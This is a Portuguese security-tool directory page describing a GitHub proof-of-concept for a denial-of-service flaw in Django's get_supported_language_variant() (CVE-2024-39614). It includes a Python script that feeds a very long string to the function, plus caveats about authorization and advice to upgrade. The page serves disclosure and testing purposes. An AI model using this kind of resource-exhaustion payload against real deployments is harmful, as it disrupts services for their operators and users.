Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
-CVE-2024-39614 — Exploit de prova de conceito para CVE-2024-39614, uma vulnerabilidade de negação de serviço na função get_supported_language_variant() do Django que afeta as versões 5.0<5.0.7 e 4.2<4.2.14. | Kitploit
Ferramentas/GitHubGitHub/abdurahmon3236/-cve-2024-39614
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de Penetração
GitHubabdurahmon3236/-cve-2024-39614

-CVE-2024-39614

Exploit de prova de conceito para CVE-2024-39614, uma vulnerabilidade de negação de serviço na função get_supported_language_variant() do Django que afeta as versões 5.0<5.0.7 e 4.2<4.2.14.

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito (PoC) para Vulnerabilidade de Negação de Serviço no Django

Este repositório contém um script de Prova de Conceito (PoC) demonstrando uma vulnerabilidade de negação de serviço (DoS) no Django versões 5.0 anteriores a 5.0.7 e 4.2 anteriores a 4.2.14. A vulnerabilidade está na função get_supported_language_variant(), que é suscetível a um potencial ataque DoS ao lidar com strings muito longas contendo caracteres específicos.

Tabela de Conteúdo

  • Descrição da Vulnerabilidade
  • Configuração e Uso
    • Script PoC
  • Considerações Importantes
  • Mitigação

Descrição da Vulnerabilidade

CVE-ID: (Pendente)

Visão Geral: A função get_supported_language_variant() no Django versões 5.0 anteriores a 5.0.7 e 4.2 anteriores a 4.2.14 é vulnerável a um ataque de negação de serviço. Esta função pode ser explorada enviando strings muito longas contendo caracteres específicos, o que poderia levar a um esgotamento de recursos e, consequentemente, a uma condição de negação de serviço.

Versões Afetadas:

  • Django 5.0 anterior a 5.0.7
  • Django 4.2 anterior a 4.2.14

Versões Corrigidas:

  • Django 5.0.7
  • Django 4.2.14

Configuração e Uso

Pré-requisitos

  • Python 3.x
  • Django instalado (pip install django)

Script PoC

Este script demonstra como um atacante pode explorar a vulnerabilidade enviando uma string muito longa para a função get_supported_language_variant().

Salve o seguinte script como dos_poc.py e execute-o.

root@kitploit:~
import django
from django.utils.translation import get_supported_language_variant

# Check Django version
if django.VERSION < (4, 2, 14) or (5, 0) <= django.VERSION < (5, 0, 7):
    print("[-] This Django version is vulnerable to the DoS attack.")
else:
    print("[+] This Django version is not vulnerable. Please use a vulnerable version for testing.")

# Generate a very long string containing specific characters
very_long_string = 'a' * 1000000 + '!'  # Adjust the length and content as necessary

def test_dos_vulnerability():
    try:
        # Trigger the vulnerability
        get_supported_language_variant(very_long_string)
        print("[+] Successfully called get_supported_language_variant with a very long string.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    test_dos_vulnerability()

Explicação

  1. Verificar a Versão do Django: O script primeiro verifica se a versão instalada do Django é vulnerável ao ataque DoS.
  2. Gerar uma String Muito Longa: Uma string muito longa contendo caracteres específicos é gerada. Ajuste o comprimento e o conteúdo conforme necessário para acionar a vulnerabilidade.
  3. Função de Teste: A função test_dos_vulnerability() chama get_supported_language_variant() com a string muito longa para testar a vulnerabilidade.
  4. Executar o Script: Quando executado, o script tentará explorar a vulnerabilidade e imprimir os resultados.

Considerações Importantes

  • Permissões: Certifique-se de ter permissão explícita para testar esta vulnerabilidade no sistema alvo. Testes não autorizados são ilegais e antiéticos.
  • Ambiente de Teste: Realize este teste em um ambiente controlado para evitar impactar sistemas de produção.
  • Consumo de Recursos: Este PoC pode consumir recursos significativos do sistema. Monitore seu sistema e esteja preparado para interromper o script se necessário.

Mitigação

Para mitigar esta vulnerabilidade, atualize para as versões corrigidas do Django:

  • Django 5.0.7
  • Django 4.2.14

Siga as instruções oficiais de atualização do Django para atualizar sua instalação do Django para a versão segura mais recente.

Mantendo seu software atualizado e seguindo as melhores práticas de segurança, você pode prevenir vulnerabilidades como este problema de DoS no Django.

Baixar ferramenta